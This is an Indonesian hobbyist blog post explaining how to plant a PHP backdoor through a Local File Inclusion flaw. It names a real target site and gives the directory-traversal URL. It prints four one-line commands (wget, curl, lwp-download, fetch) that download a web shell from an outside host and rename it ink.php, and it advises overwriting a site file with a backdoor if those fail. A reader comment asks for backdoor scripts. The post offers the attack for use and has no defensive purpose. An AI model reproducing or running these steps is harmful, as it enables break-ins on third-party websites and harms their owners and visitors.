S4N - Soft4Newbie | Sebenernya gampang banget yah meng-upload backdoor di web yang bisa di inject :D
Ini tutorial untuk LFI .
Biasa saya sendiri scan lewat bot yah .
Jadi gini, kalau kamu dapet shell seperti ini http://www.alsafas.org/component/remository/func-showdown//index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../../../../../../../../../..//tmp/sy00 ini tinggal kamu upload backdoor ajah .
Ada 5 cara mengupload backdoor ke shell inject, berikut screenshot lengkapnya ^^
Ini tutorial untuk LFI .
Biasa saya sendiri scan lewat bot yah .
Jadi gini, kalau kamu dapet shell seperti ini http://www.alsafas.org/component/remository/func-showdown//index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../../../../../../../../../..//tmp/sy00 ini tinggal kamu upload backdoor ajah .
Ada 5 cara mengupload backdoor ke shell inject, berikut screenshot lengkapnya ^^
wget http://fin.om.org/plugins/plugins/user/ink.txt;mv ink.txt ink.php
curl -O http://fin.om.org/plugins/plugins/user/ink.txt;mv ink.txt ink.php
lwp-download http://fin.om.org/plugins/plugins/user/ink.txt;mv ink.txt ink.php
fetch http://fin.om.org/plugins/plugins/user/ink.txt;mv ink.txt ink.php
Hasilnya ink.php
kalau udah kamu bisa masuk ke dalam backdoor kamu http://www.alsafas.org/ink.php
Jikalau 4 cara diatas tidak juga berhasil atau backdoor kita tidak terupload, kita coba untuk mengedit salah satu file .php dari web tersebut .
kita coba mengedit file CHANGELOG.php
Timpa isi dari file CHANGELOG.php tersebut dengan Uploader atau backdoor kamu
Lalu save file tadi
Berikut Hasilnya :p
File Uploader nya bisa kamu donlot disini .
Sekian tutorial cupu dari saya :">
Sumber : LINK
+ komentar + 1 komentar
mas ... minta pncerahan dan scrip backdoor untuk pengembangan pembel;ajaran lah mas...
scrip backdoor yg mw di upload ,,,
bisa di krim lewat FB
indraridho75@yahoo.co.id
Posting Komentar